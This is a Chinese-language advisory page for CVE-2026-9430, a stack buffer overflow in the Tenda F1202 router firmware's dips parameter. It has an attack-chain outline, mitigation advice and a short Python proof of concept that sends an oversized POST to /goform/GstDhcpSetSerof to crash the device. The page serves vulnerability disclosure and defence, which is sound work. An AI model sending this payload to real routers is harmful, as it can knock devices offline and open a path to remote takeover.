CVE-2026-9430 CVSS 8.8 高危

CVE-2026-9430 Tenda F1202 栈溢出漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9430

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda F1202

漏洞概述

Tenda F1202 路由器固件版本 1.2.0.20(408) 存在栈缓冲区溢出漏洞。该漏洞位于 /goform/GstDhcpSetSerof 接口的 formGstDhcpSetSer 函数中。攻击者无需用户交互，仅需低权限即可通过网络发送特制数据包，利用 dips 参数触发溢出，从而可能导致设备崩溃或远程代码执行。

技术细节

该漏洞源于 Tenda F1202 路由器固件中 formGstDhcpSetSer 函数存在严重的输入验证缺失。在处理来自 /goform/GstDhcpSetSerof 端点的请求时，程序直接将用户提交的 dips 参数值拷贝到栈上固定大小的缓冲区中，并未对数据长度进行校验。攻击者可构造超长字符串作为 dips 参数的值，触发栈缓冲区溢出。这将导致栈帧破坏，关键寄存器（如返回地址）被覆盖。结合特定的 ROP 链或 shellcode，攻击者能够重定向程序执行流程至恶意代码。鉴于 CVSS 评分为 8.8 且权限要求较低，此漏洞可被用于远程代码执行，进而接管整个路由器系统。

攻击链分析

STEP 1

侦察阶段

攻击者扫描网络，识别出运行 Tenda F1202 固件版本 1.2.0.20(408) 的目标设备。

STEP 2

漏洞利用

攻击者向 /goform/GstDhcpSetSerof 端点发送特制的 HTTP POST 请求，其中包含超长的 dips 参数值。

STEP 3

溢出触发

设备处理请求时，formGstDhcpSetSer 函数发生栈缓冲区溢出，覆盖返回地址。

STEP 4

代码执行

程序流程被劫持，攻击者注入的恶意代码（Shellcode）在设备上执行，获取系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target URL of the vulnerable endpoint
    url = f"http://{target_ip}/goform/GstDhcpSetSerof"
    
    # Payload construction
    # The buffer size needs to be determined by fuzzing or reverse engineering.
    # Sending a large pattern to trigger the crash.
    payload = "A" * 500  
    
    # Data parameters
    data = {
        "dips": payload
    }
    
    try:
        print(f"[*] Sending payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        print(f"[+] Response status code: {response.status_code}")
        print("[+] Payload sent. Check if the device has crashed or if a shell is opened.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with the actual target IP
    exploit(target)

影响范围

Tenda F1202 1.2.0.20(408)

防御指南

临时缓解措施

建议立即检查设备固件版本并升级官方补丁。在无法立即升级的情况下，应关闭路由器的远程管理功能，并修改默认 administrator 密码，同时通过防火墙规则限制对内部网络管理端口的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9430
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9430
3 Details https://www.cvedetails.com/cve/CVE-2026-9430/
4 VulDB https://vuldb.com/cve/CVE-2026-9430
5 Link https://github.com/Litengzheng/vuldb_new2/blob/main/F1202/vul_32/README.md
6 Link https://vuldb.com/submit/813915
7 Link https://vuldb.com/vuln/365411
8 Link https://vuldb.com/vuln/365411/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表